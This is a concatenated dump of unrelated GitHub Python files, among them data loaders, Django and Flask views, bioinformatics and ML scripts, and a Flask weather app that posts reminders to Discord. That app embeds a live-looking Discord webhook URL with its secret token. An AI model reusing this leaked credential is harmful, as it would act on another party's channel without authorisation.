augmented[\"mask\"]\n        else:\n            data = {\"image\": image}\n            augmented = transforms(**data)\n            return augmented[\"image\"], label\n\n    def _augment_tensors(image_tensor, label_tensor):\n        return tf.numpy_function(func=_augment,\n                                 inp=[image_tensor, label_tensor],\n                                 Tout=[image_tensor.dtype, label_tensor.dtype])\n\n    return dataset.map(_augment_tensors,\n                       num_parallel_calls=tf.data.AUTOTUNE,\n                       deterministic=True)\n\n\ndef tfrecords_as_geospatial_dataset(\n        file_pattern: PurePath = None,\n        batch_size: int = 1,\n        repeat: bool = False,\n        shuffle_buffer_size: int = 0,\n        prefetch_buffer_size: int = tf.data.AUTOTUNE,\n        transforms: albumentations.Compose = None,\n        tfr_channel_keys: list[str] = None,\n        tfr_channel_rewrite_map: dict[str, tuple[int, int]] = None,\n        tfr_label_key: str = \"label\") -> 
tf.data.Dataset:\n \"\"\"Builds a geospatial raster dataset from TFRecords.\"\"\"\n\n if not file_pattern:\n raise ValueError(\"Must provide a non-empty file pattern.\")\n if not tfr_channel_keys:\n raise ValueError(\"Must provide a non-empty list of channel keys.\")\n\n shuffle = (shuffle_buffer_size > 0)\n deterministic = (not shuffle)\n\n if tfr_channel_rewrite_map:\n channel_rewrite_map = {\n tfr_channel_keys.index(k): v\n for k, v in tfr_channel_rewrite_map.items()\n }\n else:\n channel_rewrite_map = {}\n\n def _parse_example(serialized):\n \"\"\"Parses a serialized tf.train.Example into an (image, label) tuple.\"\"\"\n # pylint: disable=no-value-for-parameter\n\n all_keys = tfr_channel_keys + [tfr_label_key]\n example = tf.io.parse_example(\n serialized,\n {key: tf.io.FixedLenFeature([], tf.string) for key in all_keys})\n\n def _build_image_from_channels(*channels_data):\n img = []\n for idx, data in enumerate(channels_data):\n with MemoryFile(data) as memfile:\n with memfile.open() as f:\n channel = f.read(1)\n if idx in channel_rewrite_map:\n v_from, v_to = channel_rewrite_map[idx]\n channel[channel == v_from] = v_to\n img.append(channel)\n img = np.stack(img, axis=-1)\n return img\n\n img = tf.numpy_function(\n func=_build_image_from_channels,\n inp=[example[key] for key in tfr_channel_keys], # type: ignore\n Tout=tf.float32)\n\n def _read_label(data):\n with MemoryFile(data) as memfile:\n with memfile.open() as f:\n label = f.read(1)\n return np.expand_dims(label, axis=-1)\n\n label = tf.numpy_function(func=_read_label,\n inp=[example[tfr_label_key]],\n Tout=tf.uint8)\n\n return img, label\n\n ds = tf.data.TFRecordDataset.list_files(str(file_pattern), shuffle=shuffle)\n ds = ds.interleave(tf.data.TFRecordDataset,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n if repeat:\n ds = ds.repeat()\n if shuffle:\n ds = ds.shuffle(buffer_size=shuffle_buffer_size)\n ds = ds.map(_parse_example,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n\n if transforms:\n ds = augment_image_dataset(ds,\n transforms=transforms,\n augment_labels=True)\n\n options = tf.data.Options()\n options.experimental_distribute.auto_shard_policy = \\\n tf.data.experimental.AutoShardPolicy.DATA\n ds = ds.with_options(options)\n ds = ds.batch(batch_size=batch_size,\n drop_remainder=True,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n\n ds = ds.prefetch(prefetch_buffer_size)\n return ds\n","repo_name":"stefanistrate/drivendata-stac-overflow","sub_path":"stac_overflow/utils/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31320706422","text":"from odoo import http\nfrom odoo.addons.website_sale.controllers.main import WebsiteSale\nfrom odoo.http import request\n\n\nclass WebsiteSaleFrogblue(WebsiteSale):\n\n @http.route(['/shop/print'], type='http', auth=\"public\", website=True, sitemap=False)\n def print_saleorder(self, **kwargs):\n res = super(WebsiteSaleFrogblue, self).print_saleorder()\n sale_order_id = request.session.get('sale_last_order_id')\n if sale_order_id:\n pdf, _ = request.env.ref('frogblue_reports.report_frogblue_sale_order').sudo().render_qweb_pdf([sale_order_id])\n pdfhttpheaders = [('Content-Type', 'application/pdf'), ('Content-Length', u'%s' % len(pdf))]\n return request.make_response(pdf, headers=pdfhttpheaders)\n else:\n return 
res\n","repo_name":"liaohanzhen/custom_14","sub_path":"frogblue/frogblue_reports/controllers/website_sale/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30138300607","text":"\"\"\"\r\n\n\nCreate a function that, given a **string** with at least **three characters**\n, returns an array of its:\n\n 1. Length.\n 2. First character.\n 3. Last character.\n 4. Middle character, if the string has an odd number of characters. Middle TWO characters, if the string has an even number of characters.\n 5. Index of the second occurrence of the second character in the format **\"@ index #\"** and **\"not found\"** if the second character doesn't occur again.\n\n### Examples\n\n all_about_strings(\"LASA\") ➞ [4, \"L\", \"A\", \"AS\", \"@ index 3\"]\n \n all_about_strings(\"Computer\") ➞ [8, \"C\", \"r\", \"pu\", \"not found\"]\n \n all_about_strings(\"Science\") ➞ [7, \"S\", \"e\", \"e\", \"@ index 5\"]\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef all_about_strings(txt):\n newlist = []\n newlist.append(len(txt))\n newlist.append(txt[0])\n newlist.append(txt[-1])\n if len(txt) % 2 != 0:\n middle = len(txt) // 2\n newlist.append(txt[middle])\n else:\n middle = len(txt) // 2\n to_add = txt[middle-1] + txt[middle]\n newlist.append(to_add)\n temp = txt[1]\n if txt.count(temp) == 1:\n newlist.append('not found')\n return newlist\n else:\n txt = txt[0:1] + '$' + txt[2:]\n first_index = txt.index(temp)\n newlist.append('@ index {}'.format(first_index))\n return newlist\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"pEozhEet5c8aFJdso_24.py","file_name":"pEozhEet5c8aFJdso_24.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8776967750","text":"from flask import flask, render_template \nfrom datetime import date\n\n\napp = flask(__name__)\n\n@app.route('/')\ndef show_nasa_pic():\n\ttoday = str(date.today())\n\tresponce = request.get('')\n\tdata= respond\t\n\n\n\nif __name__ =='__main__':\n\tapp.run(debug = True, host='127.0.0.1')\n","repo_name":"clayheart/teamedge-flask-projects","sub_path":"hello_flash/templates/APP.PY","file_name":"APP.PY","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70530520412","text":"############\n## INIT ##\n############\n\nfrom __future__ import print_function\nimport sys, tabix, time, re\n\nprog_name = sys.argv[0].split('/')[-1]\nif len(sys.argv) == 3:\n in_vcf = sys.argv[1]\n in_db = sys.argv[2] # bed.gz\n print(\"[%s] %s run initiated.\" % (time.ctime(), prog_name), file=sys.stderr)\nelse:\n sys.exit(\"\\nUsage: python %s \\n\" % prog_name)\n# fi\n\n\n## Module\ndef has_indel(ref, alts):\n flag_has_indel = False\n ref_len = len(ref)\n\n for alt in alts:\n if ref_len == len(alt) == 1:\n continue\n else:\n flag_has_indel = True\n # fi\n # for end \n return flag_has_indel\n# fed\n\n# Init tabix\ndb = tabix.open(in_db)\n\n# Proc VCF\nfor line in open(in_vcf, \"r\"):\n if line.startswith('#'):\n print(line.strip())\n continue\n field = line.strip().split('\\t')\n chrom = field[0]\n chrom_id = chrom.replace(\"chr\", '')\n chrom_id = 'M' if chrom_id == \"MT\" else chrom_id\n one_pos = int(field[1])\n chr_pos = \"%s:%s\" % (chrom_id, one_pos)\n ref = field[3]\n alts = field[4].split(',')\n query_db = \"chr%s:%s-%s\" % (chrom_id, one_pos, one_pos)\n 
flag_has_indel = has_indel(ref, alts)\n if not flag_has_indel: # if var has no indel\n print(line.strip())\n continue\n\n try:\n results = db.querys(query_db) # send query\n iter_cnt = sum(1 for _ in results)\n except tabix.TabixError:\n print(line.strip())\n continue\n\n # If at least 1 STR present\n if iter_cnt > 0:\n continue\n elif iter_cnt == 0:\n print(line.strip())\n continue\n else:\n sys.exit(\"ERROR: iter_cnt = %s\" % iter_cnt)\n# for line end\n","repo_name":"soymintc/rainbow","sub_path":"scripts/dbflt_str.py","file_name":"dbflt_str.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"36758840014","text":"import sklearn as sk\nfrom sklearn import datasets as ds\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\ntrainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\TrainingDataset\"\ntestPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\TestingDataset\"\n\ngradeTrain = ds.load_files(trainPath,load_content = True,encoding = 'utf-8')\ngradeTest = ds.load_files(testPath,load_content= True,encoding = 'utf-8')\ngrade3CertainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\Grade-Certain\\Grade3-Certain.txt\"\ngrade4CertainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\Grade-Certain\\Grade4-Certain.txt\"\ngrade3CertainList = []\ngrade4CertainList = []\n\n#['Grade 1 or 2', 'Grade 3', 'Grade 4', 'Non-Existent'] - target_names\n# CountVectorizer- Turn text in matrix of token counts\n# Tfidf - Calculate term frequency times inverse document frequency\n\n\n'''Create and train a classifier'''\ndef trainClf():\n global clf\n # Pipeline to quickly train classifier\n clf = Pipeline([('vect',CountVectorizer()),\n ('tfidf',TfidfTransformer()),\n ('clf',MultinomialNB())])\n\n clf = clf.fit(gradeTrain['data'],gradeTrain['target'])\n\n\n'''Predict on Test Data set'''\ndef predictTest():\n predicted = clf.predict(gradeTest['data'])\n certain = checkCertain(gradeTest['data'])\n for change in certain:\n predicted[change[0]] = change[1]\n print(\"TOTAL ACCURACY: \" + str(accuracy_score(gradeTest['target'],predicted)))\n for x in range(len(predicted)):\n index = gradeTest['target'][x]\n pIndex = predicted[x]\n print(gradeTest['data'][x] + \"| ACTUAL:\" +\n gradeTest['target_names'][index] + \" PREDICTED: \"\n + gradeTest['target_names'][pIndex])\n\n'''Loads/Maps the text files containing the words which determines the grade'''\ndef loadCertain(path,list):\n rObject = open(path, 'r')\n for line in rObject:\n line = line.strip()\n line = line.lower()\n list.append(line)\n\n'''Checks if the data passed in contains terms that are specific to a certain grade'''\ndef checkCertain(data):\n certain = []\n #certain indicator - (index,grade)\n for x in range(len(data)):\n temp = ()\n for indicator in grade3CertainList:\n if indicator in data[x]:\n temp = (x,1)\n for i in grade4CertainList:\n if i in data[x]:\n print(i)\n temp = (x,2)\n if temp:\n certain.append(temp)\n return 
certain\n\nloadCertain(grade3CertainPath,grade3CertainList)\nloadCertain(grade4CertainPath,grade4CertainList)\n\ntrainClf()\npredictTest()","repo_name":"Unagifan/GITGrader","sub_path":"GITGradeClassifier.py","file_name":"GITGradeClassifier.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23460529031","text":"from django.contrib.auth import authenticate\nfrom django.contrib.auth.models import User\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework import generics, filters, status\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom rest_framework import permissions\nfrom rest_framework.decorators import api_view\nfrom rest_framework.generics import (\n CreateAPIView,\n RetrieveUpdateDestroyAPIView, ListAPIView,\n)\n\nfrom user.models import User\nfrom user.serializers import (\n UserSerializer,\n UserLoginSerializer,\n UserLogoutSerializer,\n UserProfileSerializer,\n FollowingSerializer,\n)\n\n\n@api_view([\"GET\"])\ndef user_endpoints(request):\n base_url = request.build_absolute_uri(\"/api/user/\")\n endpoints = {\n \"Create user\": f\"{base_url}register/\",\n \"Login\": f\"{base_url}login/\",\n \"Logout\": f\"{base_url}logout/\",\n \"Token\": f\"{base_url}token/\",\n \"Refresh Token\": f\"{base_url}token/refresh/\",\n \"Verify Token\": f\"{base_url}token/verify/\",\n \"My profile\": f\"{base_url}me/\",\n \"Search Users\": f\"{base_url}users/search/\",\n \"Update/Delete User Profiles\": f\"{base_url}profiles//\",\n \"Following Users\": f\"{base_url}following/\",\n \"User's Followers\": f\"{base_url}/followers/\",\n \"My profiles\": f\"{base_url}profile/\",\n \"User Profiles\": f\"{base_url}all/\",\n \"User's Profile\": f\"{base_url}/\",\n }\n return Response(endpoints)\n\n\nclass IsOwnerOrReadOnly(permissions.BasePermission):\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return True\n return obj.user == request.user\n\n\nclass CreateUserView(CreateAPIView):\n serializer_class = UserSerializer\n\n\nclass UserLoginView(APIView):\n serializer_class = UserLoginSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid():\n email = serializer.validated_data[\"email\"]\n password = serializer.validated_data[\"password\"]\n user = authenticate(request, email=email, password=password)\n if user is not None:\n return Response(\n {\"message\": \"Login successful.\"}, status=status.HTTP_200_OK\n )\n else:\n return Response(\n {\"message\": \"Invalid email or password.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserLogoutView(APIView):\n serializer_class = UserLogoutSerializer\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n refresh_token = request.data.get(\n \"refresh\",\n )\n # Blacklist the refresh token to invalidate it\n try:\n token = RefreshToken(refresh_token)\n token.blacklist()\n return Response({\"detail\": \"Logout successful\"})\n except Exception:\n return Response({\"detail\": \"Invalid token\"}, status=401)\n\n\nclass ManageUserView(generics.RetrieveUpdateAPIView):\n serializer_class = UserSerializer\n authentication_classes = (JWTAuthentication,)\n 
permission_classes = (IsAuthenticated,)\n\n def get_object(self):\n return self.request.user\n\n\nclass UserProfileUpdateDeleteView(RetrieveUpdateDestroyAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n\n queryset = User.objects.all()\n serializer_class = UserProfileSerializer\n lookup_field = \"pk\"\n\n def get(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n def put(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, *args, **kwargs):\n instance = self.get_object()\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserDetailView(generics.RetrieveAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n serializer_class = UserProfileSerializer\n\n def get(self, request, pk):\n user = User.objects.get(pk=pk)\n serializer = self.serializer_class(user, context={\"request\": request})\n data = serializer.data\n return Response(data)\n\n def get_followers(self, request, pk):\n user = User.objects.get(pk=pk)\n followers = user.followers.all()\n serializer = self.serializer_class(followers, many=True, context={\"request\": request})\n data = serializer.data\n return Response(data)\n\n def post(self, request, pk):\n user = User.objects.get(pk=pk)\n request_user = request.user\n if request_user.is_authenticated:\n if user.followers.filter(pk=request_user.pk).exists():\n user.followers.remove(request_user)\n return Response(\n {\n \"username\": user.username,\n \"profile_picture\": user.profile_picture.url\n if user.profile_picture\n else None,\n \"followed\": False,\n },\n status=status.HTTP_200_OK,\n )\n else:\n user.followers.add(request_user)\n return Response(\n {\n \"username\": user.username,\n \"profile_picture\": user.profile_picture.url\n if user.profile_picture\n else None,\n \"followed\": True,\n },\n status=status.HTTP_200_OK,\n )\n return Response(\n {\"detail\": \"Authentication required\"}, status=status.HTTP_401_UNAUTHORIZED\n )\n\n\nclass UserProfileListAPIView(APIView):\n def get(self, request):\n profiles = User.objects.all()\n serializer = UserSerializer(profiles, many=True)\n return Response(serializer.data)\n\n\nclass UserSearchView(generics.ListAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n serializer_class = UserSerializer\n queryset = User.objects.all()\n filter_backends = [filters.SearchFilter]\n search_fields = [\"username\", \"email\"]\n\n\nclass FollowingUserListAPIView(ListAPIView):\n serializer_class = FollowingSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user = self.request.user\n return user.following.all()\n\nclass FollowerListView(ListAPIView):\n serializer_class = UserSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user = self.request.user\n return user.followers.all()\n","repo_name":"avkpol/social-media-API","sub_path":"user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
+{"seq_id":"1613602569","text":"#!/usr/bin/python3\nimport sys\n#print(sys.argv)\nin1 = input('Enter 1-st interface in the bundle: ')\nin2 = input('Enter 2-nd interface in the bundle: ')\nae = input('Enter ae number: ')\ninterface_template = [ 'set interface {int1} gigether-options 802.3ad ae{ae}',\n\t\t\t'set interface {int2} gigether-options 802.3ad ae{ae}',\n\t\t\t'set interface ae{ae} aggregated-ether-options lacp periodic fast']\n#print(in1, in2, ae)\t   \nprint('\\n'.join(interface_template).format(int1=in1, int2=in2, ae=ae))\n","repo_name":"arturiuslim/arthur_storage","sub_path":"arthurs_scripts/jum_ae_int.py","file_name":"jum_ae_int.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25199218689","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time    : 2019/5/5 10:19 AM\n# @Author  : Chenzd\n# @Site    : Read the configuration file\n# @File    : readConfig.py\n# @Software: PyCharm\n# @company: LEELEN\nimport configparser\nimport os\nimport filePath\nfrom public.configLog import Logger\nlogger = Logger(logger='public.readConfig.ReadConfig').getlog()\n\nconfig_file = os.path.join(filePath.config_path, 'config.ini')\n\nclass ReadConfig:\n\n    def __init__(self):\n        self.configParser = configparser.ConfigParser()\n        self.configParser.read(config_file)\n\n    def get_email(self,name):\n        value = self.configParser.get('email',name)\n        logger.info('Read config.ini email:[%s:%s]'%(name, value))\n        return value\n\nif __name__ == '__main__':\n    a = ReadConfig().get_email('mail_user')\n    print(a)","repo_name":"chales20/ios_luxdomo","sub_path":"public/readConfig.py","file_name":"readConfig.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30955299518","text":"import shlex\nimport subprocess\n\ndef execute_cmd(args, useBash = False, printOutput=True):\n    \"\"\"\n    Execute the external command, optionally printing its stdout; raise CalledProcessError on a non-zero exit code.\n    \"\"\"\n\n    if useBash:\n        args = 'bash.exe -c \"' + ' '.join(args) + '\"'\n    \n    print('running: ' + str(args))\n\n    if printOutput:\n        popen = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)\n        for stdout_line in iter(popen.stdout.readline, ''):\n            print(stdout_line, end='')\n\n        popen.stdout.close()\n    else:\n        popen = subprocess.Popen(args)\n\n    return_code = popen.wait()\n    if return_code:\n        raise subprocess.CalledProcessError(return_code, args)\n\n","repo_name":"c-esswein/gemsearch","sub_path":"gemsearch/utils/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38587622983","text":"import numpy as np\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\n\ndata = np.mat([[1, 200, 105, 3, False],\n               [2, 165, 80, 2, False],\n               [3, 184.5, 120, 2, False],\n               [4, 116, 70.8, 1, False],\n               [5, 270, 150, 4, True]])\n\ncoll = []\nfor row in data:\n    coll.append(row[0, 1])\n\nstats.probplot(coll, plot=plt)\nplt.show()\n","repo_name":"Inspring6/OpenCV_TensorFlow","sub_path":"ch03/program3-4.py","file_name":"program3-4.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"36389812368","text":"import os\nfrom unittest import TestCase\nimport subprocess\n\n\nclass LocustTestCase(TestCase):\n\n    def test(self):\n        path = os.path.abspath(\n            
os.path.join(\n os.path.dirname(__file__),\n 'django/project/db.sqlite3'\n )\n )\n subprocess.call(['cp', os.devnull, path])\n subprocess.Popen(\n ['python tests/django/project/manage.py migrate && '\n 'python tests/django/project/manage.py runserver'],\n shell=True\n )\n popen = subprocess.Popen([\n 'locust', '-f', 'tests/_locust.py', '--clients=2',\n '--no-web', '--host=http://127.0.0.1:8000'\n ])\n pid = popen.pid\n subprocess.call([\n '''\n sleep 20 && kill {pid}\n '''.format(\n pid=pid\n )\n ], shell=True)\n popen.wait()\n subprocess.call([\n '''\n ps aux |grep manage | grep runserver |\n awk {{'print $2'}} | xargs kill\n '''\n ], shell=True)\n self.assertEquals(popen.returncode, 0)\n","repo_name":"sergeyglazyrindev/gherkin-locust","sub_path":"tests/test_adapters.py","file_name":"test_adapters.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41236648900","text":"\"\"\" dl_model_eval.py: \n \n This program is used to separately evaluate the model with the eval dataset.\n \n A CSV containing the eval dataset is iterated through and the model is used to predict the label of each Tweet.\n\"\"\"\n\n__author__ = \"Breydon Verryt-Reid\"\n__date__ = \"28 Sep 22\"\n__version__ = 1.5\n__status__ = \"Complete\"\n__notes__ = \"This program is intended to be run as a standalone program\"\n\n# importing required libraries\n# !pip install transformers\nfrom transformers import pipeline, AutoModelForSequenceClassification\nimport csv\n\ndef dlmodelmain(input):\n \"\"\" This function contains the model which takes in a string or list of strings and performs an analysis of that text\n\n ** Parameters **\n input: a str containing the body of a Tweet (after being preprocessed)\n\n ** Returns **\n N/A\n \"\"\"\n model = AutoModelForSequenceClassification.from_pretrained(\"bvrau/covid-twitter-bert-v2-struth\", num_labels=2) # this is the model that was trained\n pipe = pipeline(\"text-classification\", model=model, tokenizer=\"bvrau/covid-twitter-bert-v2-struth\", top_k=2, function_to_apply=\"sigmoid\") # this is the pipeline that is used to make predictions\n result = pipe(input) # this is the prediction\n print(result,\"\\n\") # prints the prediction result\n \n # this section of code is used to return the predicted label and score - not in use\n # resultdict = result[0]\n # label = resultdict['label']\n # score = resultdict['score']\n # print(\"** Results **\")\n # print(\"Determination: \"+label)\n # print(\"Certainty: \"+str(score)) \n # return label, score\n\ndef dataloader(file):\n \"\"\" This function loads the data from the csv file and lists item by item the expected output.\n The data is then passed to the dlmodelmain function for pipeline prediction.\n The results are then compared to the expected output and the accuracy is calculated.\n\n ** Parameters **\n N/A\n\n ** Returns **\n N/A\n \"\"\" \n test = file\n with open(test, 'r') as csvfile: # opens the csv file\n datareader = csv.reader(csvfile, delimiter=',') # reads the csv file\n next(datareader) # skips the first row of the csv file (headers)\n for row in datareader: # iterates through each row of the csv file\n if row[0] == \"0\": \n actual = \"real\" # sets the expected output to real\n elif row[0] == \"1\":\n actual = \"fake\" # sets the expected output to fake\n print(\"This should be classified: \", actual) # prints the expected output\n dlmodelmain(row[1]) # passes the Tweet body to the dlmodelmain function for 
prediction\n\ndataloader(\"preproc_data_eval.csv\")","repo_name":"Struth-Social-UNSW/ITProject2","sub_path":"Backend/deep-learn-algo/train_test/dl_model_eval.py","file_name":"dl_model_eval.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30792608133","text":"import sys\nimport time\nimport subprocess\nfrom subprocess import PIPE, Popen\nfrom threading import Thread\nfrom queue import Queue, Empty # python 3.x\n\n# Django Thread\ndef start_django():\n    subprocess.call(['python', './servers/manage.py', 'runserver', '0.0.0.0:8000'])\n\ndjangoThread = Thread(target=start_django, name=\"Django Thread\")\ndjangoThread.start()\n\n\ntime.sleep(2)\n\ndef start_clients():\n    subprocess.call(['python', './clients.py'])\n\nclientsThread = Thread(target=start_clients, name=\"Clients Thread\")\nclientsThread.start()\n\n\ntime.sleep(3)\n\ndef start_simulation():\n    subprocess.call(['python', './__main__.py'])\n\nsimulationThread = Thread(target=start_simulation, name=\"Simulation Thread\")\nsimulationThread.start()\n\n\n","repo_name":"imran1161/Access-Control-Framework","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70161342172","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('profiles', '0003_auto_20170705_0313'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='profiles',\n            name='locations',\n            field=models.CharField(blank=True, max_length=120, default='My Location Default', null=True),\n        ),\n    ]\n","repo_name":"csp5096/python3.5-django-ecommerce","sub_path":"src/profiles/migrations/0004_auto_20170705_0316.py","file_name":"0004_auto_20170705_0316.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27905926095","text":"from geopy.geocoders import Nominatim\nfrom flask import *\nimport requests\nimport json\nimport getweather\nimport threading\nimport time\nimport schedule\n\napp = Flask(__name__)\n\n# calling the nominatim tool\ngeoLoc = Nominatim(user_agent=\"GetLoc\")\n \n\nweather_api_url = \"https://opendata.cwa.gov.tw/api/v1/rest/datastore/F-C0032-001\"\n#\"latitude\":\"25.0575931\",\"longitude\":\"121.3625344\"\n@app.route('/get_weather', methods=['GET'])\ndef get_weather():\n    data = request.get_json()\n    authorization = data.get('Authorization')\n    latitude = data.get('latitude')\n    longitude = data.get('longitude')\n    # location = data.get('locationName')\n    locname = geoLoc.reverse(\"25.0575931, 121.3625344\")\n    address_parts = locname.address.split(\", \")\n    if len(address_parts) >= 4:\n        location = address_parts[-3]# city/county\n        district = address_parts[-4]# district\n        print(\"City/county:\", location)\n        print(\"District:\", district)\n    else:\n        print(\"Address information is insufficient\")\n    print(locname.address)\n    if not authorization or not latitude or not longitude:\n        return jsonify({'error': 'Missing parameters from the frontend'})\n\n    params = {\n        'Authorization': authorization,\n        'locationName': location,\n        'format': 'JSON', \n    }\n    try:\n        response = requests.get(weather_api_url, params=params)\n        response.raise_for_status() \n\n        try:\n            weather_data = response.json()\n            return jsonify(weather_data)\n        except json.JSONDecodeError as e:\n            return jsonify({'error': 'API response could not be parsed as JSON'})\n\n    except requests.exceptions.RequestException as e:\n        return jsonify({'error': 'API request failed'})\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\ndef sendmsg(name,content):\n    webhook_url=\"https://discordapp.com/api/webhooks/1163495849842704565/I7SJdtkonFMMvuXFs3GQTshXtwCB47N3juFGLNtBf1bLAevRIXukZdH82j31jfhRbCxQ\"\n    data={\"content\":\"Hi \"+name+\",\\n\"+content}\n    headers = {'Content-Type': 'application/json'}\n    requests.post(webhook_url, data=json.dumps(data), headers=headers) \n    #time.sleep(28800)\n    time.sleep(60)\n\n\n#control=0 =>will not send msg to discord\ncontrol=0\n\ndef schedule_sendmsg(name,content):\n    global control\n    while control==1:\n        #schedule.every().monday.at(\"09:00\").do(sendmsg,name,content[0])# send in the morning\n        #schedule.every().tuesday.at(\"09:00\").do(sendmsg,name,content[0])\n        #schedule.every().wednesday.at(\"09:00\").do(sendmsg,name,content[0])\n        #schedule.every().thursday.at(\"09:00\").do(sendmsg,name,content[0])\n        #schedule.every().friday.at(\"09:00\").do(sendmsg,name,content[0])\n        #schedule.every().monday.at(\"18:00\").do(sendmsg,name,content[1])# send in the evening\n        #schedule.every().tuesday.at(\"18:00\").do(sendmsg,name,content[1])\n        #schedule.every().wednesday.at(\"18:00\").do(sendmsg,name,content[1])\n        #schedule.every().thursday.at(\"18:00\").do(sendmsg,name,content[1])\n        #schedule.every().friday.at(\"18:00\").do(sendmsg,name,content[1])\n        schedule.every().friday.at(\"19:25\").do(sendmsg,name,content[1])\n        schedule.run_pending()\n        time.sleep(60)\n\n#set control=1 and open clock to send msg to discord\n@app.route('/api/remind', methods=['GET'])\ndef api_remind():\n    global control\n    #need to add query string ex: /api/remind?username=123&cityselect=新北市\n    city=request.args.get(\"cityselect\")\n    username=request.args.get(\"username\")\n    data=getweather.get_location_weather(city)\n    try:\n        control=1\n        task_thread = threading.Thread(target=schedule_sendmsg, args=(username, data))\n        task_thread.daemon = True\n        task_thread.start()\n\n        data = {\"message\":\"Sent successfully\"}\n        return jsonify(data)\n    except Exception as e:\n        return jsonify({\"error\":\"Failed to send: \"+str(e)})\n\n\n#set control=0 and turn off reminder\n@app.route('/api/turnoff', methods=['GET'])\ndef api_turnoff():\n    global control\n    try:\n        control=0\n        print(control)\n        data = {\"message\":\"Turned off successfully\"}\n        return jsonify(data)\n    except Exception as e:\n        return jsonify({\"error\":\"Failed to turn off: \"+str(e)})\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', 